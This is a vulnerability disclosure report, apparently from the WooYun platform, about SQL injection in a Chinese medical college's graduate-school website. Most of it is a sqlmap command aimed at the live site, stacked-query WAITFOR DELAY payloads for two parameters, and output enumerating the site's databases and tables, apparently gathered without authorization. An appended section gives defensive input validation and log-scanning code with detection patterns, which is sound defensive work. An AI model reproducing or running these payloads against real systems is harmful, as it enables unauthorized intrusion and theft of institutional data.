
Vulnerability Summary

Defect ID: wooyun-2015-0114197

Title: SQL injection vulnerability in the Graduate School of Guiyang Medical College (贵阳医学院研究生部)

Vendor: Guiyang Medical College Graduate School (贵阳医学院研究生部)

Author: 凌零1

Submitted: 2015-05-15 11:44

Fix time: 2015-05-20 11:46

Disclosed: 2015-05-20 11:46

Type: SQL injection

Severity: Low

Self-assessed rank: 4

Status: Handed over to a third-party partner (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-05-15: Details sent to the vendor; awaiting vendor handling
2015-05-20: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Was just browsing around and found this little hole.

Detailed description:

1. python sqlmap.py -u "http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4" -p bmid


GET parameter 'bmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: bmid (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: bmid=13;WAITFOR DELAY '0:0:5'--&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4
---
[17:07:42] [INFO] testing Microsoft SQL Server
[17:07:42] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[17:07:49] [INFO] confirming Microsoft SQL Server
[17:07:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:07:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:07:55] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\output\yjsb.gmc.edu.cn'

Haha, stacked queries.
Here's another one:
2. http://yjsb.gmc.edu.cn/yzxx/yjxx.asp?ID=153

GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: ID (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ID=153;WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[17:33:35] [INFO] testing Microsoft SQL Server

Proof of vulnerability:

Databases:
available databases [7]:
[*] gedu
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Dumping the tables is far too slow!!!

[23:38:34] [INFO] fetching database names
[23:38:34] [INFO] fetching number of databases
[23:38:34] [INFO] resumed: 7
[23:38:34] [INFO] resumed: gedu
[23:38:34] [INFO] resumed: master
[23:38:34] [INFO] resumed: model
[23:38:34] [INFO] resumed: msdb
[23:38:34] [INFO] resumed: Northwind
[23:38:34] [INFO] resumed: pubs
[23:38:34] [INFO] resumed: tempdb
[23:38:34] [INFO] fetching tables for databases: Northwind, gedu, master, model, msdb, pubs, tempdb
[23:38:34] [INFO] fetching number of tables for database 'tempdb'
[23:38:34] [INFO] resumed: 2
[23:38:34] [INFO] resumed: dbo.sysconstraints
[23:38:34] [INFO] resumed: dbo.syssegments
[23:38:34] [INFO] fetching number of tables for database 'gedu'
[23:38:34] [INFO] resumed: 281

I'll stop here.

Remediation:

Filter the input~~
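As an added, defender-side example that is not part of the original report: what "filtering" concretely means for the two injectable parameters (both are numeric IDs, so strict integer validation rejects the stacked-query value outright), plus the same check and a WAITFOR DELAY signature run over constructed IIS log lines. The detection rule, function names and log lines are assumptions; only the parameter names, paths and payload shape come from the report.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Both parameters the report shows as injectable carry plain numeric IDs.
NUMERIC_PARAMS = {"bmid", "ID"}
# Hypothetical rule (not from the report): a ';'-stacked query calling WAITFOR DELAY.
STACKED_DELAY = re.compile(r";\s*(?:IF\s*\(.*?\)\s*)?WAITFOR\s+DELAY\s+'", re.I)

def validate_numeric_param(value):
    """Server-side fix: accept only a bare integer for bmid/ID, so a value like
    "13;WAITFOR DELAY '0:0:5'--" is rejected before any SQL text is built."""
    return int(value) if re.fullmatch(r"\d{1,9}", value) else None

def parse_query(query):
    """Split on '&' only, so an injected ';' stays inside the value it was put in."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, val = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params

def inspect_request(url):
    """Flag numeric params failing validation and any WAITFOR DELAY payload."""
    query = urlsplit(url).query
    params = parse_query(query)
    invalid = sorted(p for p in params if p in NUMERIC_PARAMS
                     and any(validate_numeric_param(v) is None for v in params[p]))
    return {"invalid_params": invalid,
            "time_based_payload": bool(STACKED_DELAY.search(unquote_plus(query)))}

def scan_iis_log(lines):
    """IIS W3C lines ('date time cs-method cs-uri-stem cs-uri-query ...'): return suspicious ones."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 5:
            continue
        url = fields[3] + ("?" + fields[4] if fields[4] != "-" else "")
        verdict = inspect_request(url)
        if verdict["invalid_params"] or verdict["time_based_payload"]:
            hits.append((fields[0] + " " + fields[1], fields[3], verdict))
    return hits

# Constructed sample log lines (not from the report); the ~5 s time-taken on the
# two payload requests is the delay that WAITFOR DELAY '0:0:5' induces.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status time-taken
2015-05-14 17:07:40 GET /bmzz/index.asp bmid=13&bmmc=%E5%AD%A6%E4%BD%8D 200 31
2015-05-14 17:07:42 GET /bmzz/index.asp bmid=13;WAITFOR%20DELAY%20'0:0:5'--&bmmc=x 200 5031
2015-05-14 17:33:35 GET /yzxx/yjxx.asp ID=153;IF(1=1)%20WAITFOR%20DELAY%20'0:0:5'-- 200 5016
2015-05-14 17:34:01 GET /yzxx/yjxx.asp ID=153 200 28"""
```

Validation alone closes the hole for these endpoints; the log scan is what lets a defender see how far the time-based enumeration got, using the elevated time-taken values as corroboration.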

Copyright notice: when reposting, please credit the source: 凌零1@乌云


Vulnerability Response

Vendor response:

Severity: No impact; ignored by the vendor

Ignored at: 2015-05-20 11:46

Vendor reply:

Latest status:

None yet

